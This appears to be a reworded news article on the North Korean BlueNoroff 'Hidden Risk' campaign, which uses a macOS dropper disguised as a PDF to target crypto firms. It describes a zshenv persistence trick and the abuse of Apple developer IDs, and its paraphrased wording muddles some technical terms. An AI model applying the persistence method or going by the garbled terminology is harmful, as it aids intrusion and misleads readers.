North Korean Cybercriminals Target Cryptocurrency Companies with Covert Risky Malware on macOS
An anonymous entity linked to the Democratic People’s Republic of Korea (DPRK) has been found targeting companies in the cryptocurrency space using sophisticated malware capable of infiltrating Apple macOS devices.
Security firm SentinelOne, branding the operation Hidden Risk, has confidently connected it to BlueNoroff, a group previously associated with malicious software families such as RustBucket, KANDYKORN, ObjCShellz, RustDoor (also known as Thiefbucket), and TodoSwift.
The initiative “utilizes emails spreading fabricated news related to cryptocurrency trends for infecting targets via a malevolent application disguised as a PDF document,” noted researchers Raffaele Sabato, Phil Stokes, and Tom Hegel in a report provided to The Hacker News.
“The operation probably kicked off as early as July 2024 and employs email and PDF baits with sham news headlines or stories pertaining to crypto-related subjects.”
As per a disclosure by the U.S. Federal Bureau of Investigation (FBI) in a September 2024 bulletin, these schemes constitute “highly customized, challenging-to-detect social engineering” assaults targeted at employees in the decentralized finance (DeFi) and crypto domains.
The assaults present themselves as false job prospects or corporate investments, engaging with their victims over an extended period to establish trust before introducing malware.
SentinelOne pointed out an email scam aimed at a crypto sector in late October 2024 that distributed a dropper application masquerading as a PDF file (“Hidden Risk Behind New Surge of Bitcoin Price.app”) hosted on delphidigital[.]org.
The program, scripted in the Swift language, was validated and authorized on October 19, 2024, using the Apple developer ID “Avantis Regtech Private Limited (2S8XHJ7948).” The validation has since been annulled by Apple.
Upon activation, the application downloads and demonstrates a decoy PDF file fetched from Google Drive to the victim, while simultaneously fetching a second-stage executable from an offsite server and executing it. An unsigned C++-based Mach-O x86-64 executable acts as a backdoor to run remote commands.
The backdoor also integrates an innovative persistence method that exploits the zshenv configuration file, marking the first instance of such exploitation by malicious actors in real-world scenarios.
“This is particularly valuable on contemporary macOS versions since Apple has introduced user notifications for background Login Items starting macOS 13 Ventura,” the researchers commented.
“Apple’s notification feature aims to alert users when a persistence technique is deployed, especially frequently exploited LaunchAgents and LaunchDaemons. However, exploiting Zshenv does not trigger such a notification in current macOS iterations.”
The threatening entity has been observed leveraging domain registrar Namecheap to organize an infrastructure revolving around themes connected to crypto, Web3, and investments to project an air of legitimacy. Quickpacket, Routerhosting, and Hostwinds are among the frequently used hosting service providers.
Of note is the occurrence of some similarities with a previous operation flagged by Kandji in August 2024, which also employed a similarly named macOS dropper application “Risk factors for Bitcoin’s price decline are emerging(2024).app” to deploy TodoSwift.
The motives behind the decision to alter tactics remain unclear, and whether it is a reaction to public disclosures. Stokes informed The Hacker News, “North Korean actors are recognized for their ingenuity, flexibility, and vigilance concerning reports on their actions, so it’s entirely conceivable that we’re simply witnessing diversification of effective methods from their offensive cyber initiatives.”
An additional distressing aspect of the campaign is BlueNoroff’s capability to obtain or hijack authentic Apple developer accounts and exploit them to have their malware authorized by Apple.
“Over the past year or so, North Korean cyber actors have carried out multiple offensives against crypto industries, many of which involved extensive target grooming via social platforms,” the researchers further added.
“The Hidden Risk operation deviates from this strategy by adopting a more conventional and direct, yet not necessarily less potent, email phishing approach. Despite the straightforwardness of the initial infection vector, other features reminiscent of past DPRK-supported operations are discernible.”
These developments follow other initiatives orchestrated by North Korean hackers to seek employment in various Western companies and spread malware using rigged codebases and conference tools to entice job seekers under the guise of a recruitment challenge or a project.
The two cyber intrusions, named Wagemole (also UNC5267) and Contagious Interview, have been credited to a malevolent group identified as Famous Chollima (also CL-STA-0240 and Tenacious Pungsan).
ESET, branding Contagious Interview as DeceptiveDevelopment, has categorized it as a new Lazarus Group initiative focused on targeting freelance developers globally for cryptocurrency theft.
“The Contagious Interview and Wagemole campaigns exhibit the evolving strategies of North Korean threat actors as they persist in stealing data, obtaining remote positions in Western nations, and circumventing financial embargoes,” noted Zscaler ThreatLabz researcher Seongsu Park in a recent statement.
“With enhanced obfuscation methods, cross-platform compatibility, and extensive data theft, these campaigns represent an escalating threat to businesses and individuals alike.”
About Author
